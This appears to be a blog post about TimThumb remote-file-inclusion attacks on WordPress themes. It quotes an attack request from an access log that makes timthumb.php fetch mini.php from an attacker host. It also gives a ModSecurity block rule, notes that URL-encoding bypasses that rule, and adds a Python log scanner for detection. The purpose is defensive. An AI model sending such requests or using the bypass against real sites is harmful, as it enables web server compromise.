Timthumb.php hack attempts

Hackers are targeting WordPress sites by sending requests to a 'timthumb.php' file that ships inside many themes.

What is Timthumb?

TimThumb is an image-resizing PHP script bundled with a large number of WordPress themes (here it sits under wp-content/themes/Webly/). It takes the image to resize from its src parameter, and older versions would fetch src from a remote URL as long as the hostname contained one of a short list of allowed domains, blogger.com among them. That check was a substring match, so a host such as blogger.com.indnique.com passes it, and TimThumb then downloads the file at that URL into its cache directory on the web server. That is how the attacker gets a PHP file of their choosing (mini.php below) onto the site.

Here is an example of such a request, taken from the access log.

Offending IP: 78.46.100.241

/wp-content/themes/Webly/timthumb.php?src=http://blogger.com.indnique.com/mini.php

How to block it?

If you have ModSecurity on your Apache/cPanel server, an easy way to stop these requests is the following rule.

#Timthumb injection rule created by 0sw.com
# ModSecurity 2.7 and later refuse to load a rule without an id; 1000001 is a placeholder, use a free number from your local range
# "c=http" is a regex matched anywhere in the request URI, so it also fires on src=https, pic=http, doc=http and so on
SecRule REQUEST_URI "c=http" "id:1000001,phase:2,deny,log,msg:'File Injection Attempt',status:406"

This returns a 406 Not Acceptable response whenever a request tries to make the PHP file load a remote payload through "src=http". Two caveats: the pattern is a regex, so "c=http" also fires on any other parameter whose name ends in c (pic=http, doc=http), which may block legitimate traffic; and the match runs over the request URI with no decoding transformation, so a request that URL-encodes the value (src=http%3A%2F%2F...) slips past it. Matching ARGS:src with the t:urlDecodeUni transformation catches the encoded form, and updating TimThumb itself to a version that validates the hostname properly is the real fix.
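To see why the hostname in the request above works against the old allow-list and why a raw "c=http" match is not enough, here is an added Python example (not code from the original post or from TimThumb). It runs the weak substring check and a strict suffix check side by side, then scans a few constructed Apache access-log lines for timthumb.php requests whose src points off-site, decoding the query first so the URL-encoded variant is caught. The ALLOWED_SITES list is an assumed, illustrative version of TimThumb's allow-list, and every log line except the first request and IP is made up.

```python
"""Flag TimThumb remote-src requests in Apache access-log lines.

Added example, not code from the original post or from TimThumb. The log
lines are constructed; only the first request and IP come from the post.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client IP, ident, user, [time], "METHOD URI PROTO" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+"'
)

# Illustrative allow-list in the spirit of TimThumb's $allowedSites
# (assumed contents; the real list varies by version).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com"]


def allowed_by_substring(host, allowed=ALLOWED_SITES):
    """The weak check vulnerable TimThumb versions used: an allowed domain
    appearing anywhere inside the host passes. 'blogger.com.indnique.com'
    contains 'blogger.com', so it is accepted."""
    host = host.lower()
    return any(site in host for site in allowed)


def allowed_by_suffix(host, allowed=ALLOWED_SITES):
    """Strict check: the host must equal an allowed domain or be a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in allowed)


def remote_src(uri):
    """Return the host named in a timthumb.php src= parameter when that value is
    an absolute (http://, https:// or protocol-relative //) URL, else None.
    parse_qs decodes the query once; the extra unquote also catches %253A nesting."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/timthumb.php"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("src", []):
        try:
            target = urlsplit(unquote(raw))
        except ValueError:  # malformed IPv6 bracket and the like
            continue
        if target.netloc:  # local paths such as /wp-content/uploads/x.jpg have no netloc
            return target.hostname
    return None


def scan_log(lines):
    """Return (client IP, remote host, weak_check_passes) for each request that
    points timthumb.php at a host outside the allow-list."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host = remote_src(m.group("uri"))
        if host is not None and not allowed_by_suffix(host):
            hits.append((m.group("ip"), host, allowed_by_substring(host)))
    return hits


# Constructed sample log; the first request and IP are the ones from the post.
SAMPLE_LOG = [
    '78.46.100.241 - - [01/Jan/2011:00:00:00 +0000] "GET /wp-content/themes/Webly/timthumb.php?src=http://blogger.com.indnique.com/mini.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # same attack, URL-encoded: a raw "c=http" match on the request URI never fires on this one
    '198.51.100.7 - - [01/Jan/2011:00:00:01 +0000] "GET /wp-content/themes/Webly/timthumb.php?src=http%3A%2F%2Fblogger.com.indnique.com%2Fmini.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # legitimate local resize
    '203.0.113.5 - - [01/Jan/2011:00:00:02 +0000] "GET /wp-content/themes/Webly/timthumb.php?src=/wp-content/uploads/photo.jpg&w=100 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # remote, but genuinely on an allowed domain
    '203.0.113.5 - - [01/Jan/2011:00:00:03 +0000] "GET /wp-content/themes/Webly/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2011:00:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, host, weak_ok in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {host} (substring allow-list would have accepted it: {weak_ok})")
```

Both attack lines are reported and both carry weak_check_passes=True, which is exactly the case the substring allow-list gets wrong; the youtube request passes the suffix check and is left alone. The same decode-then-inspect-the-parameter logic is what an ARGS:src rule with t:urlDecodeUni gives you inside ModSecurity.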